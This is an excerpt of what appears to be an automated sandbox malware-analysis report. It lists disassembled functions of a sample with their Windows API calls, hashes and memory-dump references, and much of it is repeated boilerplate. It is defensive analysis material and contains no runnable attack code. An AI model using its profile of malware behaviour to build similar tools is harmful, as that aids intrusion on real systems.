                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 12b6d2b3c6aa04eff1e2c0f79324c204539706355def25435f33f8173a78bb18
                          • Instruction ID: cecc50c20f7dac21b250bfc0379f8b1f9112550bde1128013e96852b9d357d01
                          • Opcode Fuzzy Hash: 12b6d2b3c6aa04eff1e2c0f79324c204539706355def25435f33f8173a78bb18
                          • Instruction Fuzzy Hash: FA213A3551019AAED730EA35E4447EDF3A6EF80361F884056C8190B243E33EA91BD796
                          Function 0071EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071EBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071EBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 0071EBF1
                          • lstrcat.KERNEL32(?,010DD9C0), ref: 0071EC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: fe650e70237d550f5b91e31f89df02b748b762707224bffab1b820c5a297b9ef
                          • Instruction ID: aefdb38d69719ad0b1b6d9b8505ed861ce9a7199a6b984ec727b3d82f7051524
                          • Opcode Fuzzy Hash: fe650e70237d550f5b91e31f89df02b748b762707224bffab1b820c5a297b9ef
                          • Instruction Fuzzy Hash: E9316AB2A14118DBCB25EB68DC49BED77F4AF48300F104564BA15A7291DE749E858F50
                          Function 00724480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 00724492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 007244AD
                          • CloseHandle.KERNEL32(00000000), ref: 007244B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007244E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: 2e9e19284c8eb03e9d55dcef556a846478441e78eeee8703160417e23643f757
                          • Instruction ID: 605a72c872fb6fe53d6ecbea7fbc1d2dc174195e6843ca3f8ade947fa57820f7
                          • Opcode Fuzzy Hash: 2e9e19284c8eb03e9d55dcef556a846478441e78eeee8703160417e23643f757
                          • Instruction Fuzzy Hash: A5F0FCB19156656BE720AB74AC4DBE676A8AF14304F000591FA45D7180DBF49C808F90
                          Function 00728FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00728FDD
                            • Part of subcall function 007287FF: __amsg_exit.LIBCMT ref: 0072880F
                          • __getptd.LIBCMT ref: 00728FF4
                          • __amsg_exit.LIBCMT ref: 00729002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00729026
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 7439c361a03d2faea50708eda218e86b98ed3e05d0981de54c35aaf7658215b1
                          • Instruction ID: b090b04e97d099b353c3da38931cd07647ee86ffb42788464aa20004a8cce5b2
                          • Opcode Fuzzy Hash: 7439c361a03d2faea50708eda218e86b98ed3e05d0981de54c35aaf7658215b1
                          • Instruction Fuzzy Hash: A1F09672909634DBE7B4BB78790FB5D33A16F00721F284109F544662D2DF6D5900D65A
                          Function 00727310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(------,00705BEB), ref: 0072731B
                          • lstrcpy.KERNEL32(00000000), ref: 0072733F
                          • lstrcat.KERNEL32(?,------), ref: 00727349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: b74e9c52cb7ae69f62fd6ca60ae990a8086b82866f416f81b13ec018b19e584e
                          • Instruction ID: 3af9f051ce660b77ca80ef2d01c5d2dc36be033fd738ea3f396e92b45378fbd3
                          • Opcode Fuzzy Hash: b74e9c52cb7ae69f62fd6ca60ae990a8086b82866f416f81b13ec018b19e584e
                          • Instruction Fuzzy Hash: 70F030745143129FCB289F35ED59927B6F9EF45700318881DA89AC3215E734D840DF10
                          Function 007133D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00713422
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 00713471
                          • lstrcpy.KERNEL32(00000000,?), ref: 00713497
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: b2e9185bb7df49abc2f927a6981547ad2b0d5cbc1ae356bbb073c37ec7bfc3a6
                          • Instruction ID: 4b18e99ec85deaa630c71194ab3754c21204b14cc3655e172ae8b7c292490bb5
                          • Opcode Fuzzy Hash: b2e9185bb7df49abc2f927a6981547ad2b0d5cbc1ae356bbb073c37ec7bfc3a6
                          • Instruction Fuzzy Hash: A9120D74A152018FDB18CF1DC598B65B7E5AF44718B19C0AEE8099B3E2D77AED82CF40
                          Function 00717C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717CAF
                            • Part of subcall function 00717D40: std::_Xinvalid_argument.LIBCPMT ref: 00717D58
                            • Part of subcall function 00717D40: std::_Xinvalid_argument.LIBCPMT ref: 00717D76
                            • Part of subcall function 00717D40: std::_Xinvalid_argument.LIBCPMT ref: 00717D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: 38fe5825f6af4ce50ebc2e5dbed8fd42d5a8128b5719180c15a179f3417d2bf9
                          • Instruction ID: 390951fc218a23c7585ab5df4975ed4daced1ad458725505b2b58a8a002b5676
                          • Opcode Fuzzy Hash: 38fe5825f6af4ce50ebc2e5dbed8fd42d5a8128b5719180c15a179f3417d2bf9
                          • Instruction Fuzzy Hash: 2331D6723086148BE7289D6CE8809AAF7FDEF91760B20462AF5428B6C1D7759DC1C3F5
                          Function 00706EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00706F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00706F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: 57d5e0e60d6efe778a446ee5619685627e431b8312b2307480ed6138cde7594f
                          • Instruction ID: faa81664190f45ad7697ba74436769c394316fdbeb7d5fe9eb03dfd2d654ca23
                          • Opcode Fuzzy Hash: 57d5e0e60d6efe778a446ee5619685627e431b8312b2307480ed6138cde7594f
                          • Instruction Fuzzy Hash: 11216DB1600602DBEB248B20DC94BB673E8EB41705F444A78E946CB684FBB9F955CB60
                          Function 00721570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 007215A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007215D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 00721611
                          • lstrcpy.KERNEL32(00000000,?), ref: 00721649
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 4cebc11132a0a03a85c82e4ac931a6bc33cace163cee1aabce06a4d286626a94
                          • Instruction ID: ec2aaf9490c68a64ea467f4f8553262d9bb426dadf03bc34506790fccd3e6e8a
                          • Opcode Fuzzy Hash: 4cebc11132a0a03a85c82e4ac931a6bc33cace163cee1aabce06a4d286626a94
                          • Instruction Fuzzy Hash: 872106B4611B02CFD734DF6AE898A17B7F4BF54700B444A1CA896D7A81DB38F851CBA0
                          Function 00701530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00701610: lstrcpy.KERNEL32(00000000), ref: 0070162D
                            • Part of subcall function 00701610: lstrcpy.KERNEL32(00000000,?), ref: 0070164F
                            • Part of subcall function 00701610: lstrcpy.KERNEL32(00000000,?), ref: 00701671
                            • Part of subcall function 00701610: lstrcpy.KERNEL32(00000000,?), ref: 00701693
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701557
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701579
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 4ebaafa499c3bd6de6ecd0cab9ca1db0e47b71e7e29bf4ae5b36c9bc16f3f47e
                          • Instruction ID: 728b969df17439cb836afcb57eda5e8e3b5c7a707b4dd18ff9a0155bc4e073a4
                          • Opcode Fuzzy Hash: 4ebaafa499c3bd6de6ecd0cab9ca1db0e47b71e7e29bf4ae5b36c9bc16f3f47e
                          • Instruction Fuzzy Hash: 2F31C275A15B02DFC724DF7AC998952BBE5BF883007444A2DA896C7B50DB74F811CF80
                          Function 00701610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 0070162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701671
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701693
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
